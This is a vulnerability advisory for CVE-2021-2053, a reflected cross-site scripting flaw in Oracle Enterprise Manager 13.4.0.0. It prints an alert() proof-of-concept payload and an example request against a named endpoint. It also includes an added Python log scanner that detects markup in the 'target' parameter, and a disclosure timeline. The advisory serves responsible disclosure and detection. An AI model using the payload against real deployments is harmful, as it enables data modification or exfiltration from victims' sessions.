CVE-2021-2053
Reflected Cross-Site Scripting in "target" query parameter
6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Oracle Enterprise Manager
13.4.0.0
Jakub Sajniak and Artur Obuchowski
A reflected cross-site scripting vulnerability exists in the "target" GET parameter of OEM version 13.4.0.0. A specially crafted URL can trigger an XSS attack. A successful attack requires victim interaction (clicking on the malicious link) and can result in modification or exfiltration of data from the affected application.
To exploit the vulnerability, append the "target" parameter to the URL with the following payload:
</script><script>alert(document.domain)</script>
Conducted tests showed that multiple endpoints process the "target" parameter.
Example request:
GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&[...REDACTED...] HTTP/1.1
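One way to find requests of this shape in access logs, as an added example that is not part of the original advisory or of Oracle's code. It assumes that legitimate "target" values never contain angle brackets; the function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

MARKUP = re.compile(r"[<>]")  # assumption: valid target paths never contain these
MAX_DECODE_ROUNDS = 3         # assumption: bound on nested percent-encoding

# Constructed sample request lines (endpoint taken from the advisory's example).
SAMPLE_LINES = [
    "GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain"
    "&target=%2FEMGC_GCDomain%2FGCDomain HTTP/1.1",
    "GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain"
    "&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3E"
    "alert(document.domain)%3C/script%3E HTTP/1.1",
    "GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain"
    "&target=%252FEMGC_GCDomain%253C%252Fscript%253E HTTP/1.1",
]


def fully_decode(value):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_target(request_line):
    """Return the decoded "target" value if it carries markup, else None."""
    _, _, rest = request_line.partition(" ")   # drop the HTTP method
    url = rest.split(" ")[0]                   # drop the protocol version
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name == "target":
            decoded = fully_decode(value)
            if MARKUP.search(decoded):
                return decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged request line."""
    checked = ((n, suspicious_target(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in checked if value is not None]


if __name__ == "__main__":
    print(scan(SAMPLE_LINES))
```

Because the advisory notes that multiple endpoints process the parameter, the check keys on the parameter name rather than on a single path.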
- 24-09-2020 - Vulnerability reported to vendor
- 25-09-2020 - Vendor response
- 25-10-2020 - Vendor update
- 24-02-2021 - Issue addressed
- 24-04-2021 - Vendor disclosure
- 26-04-2021 - Public disclosure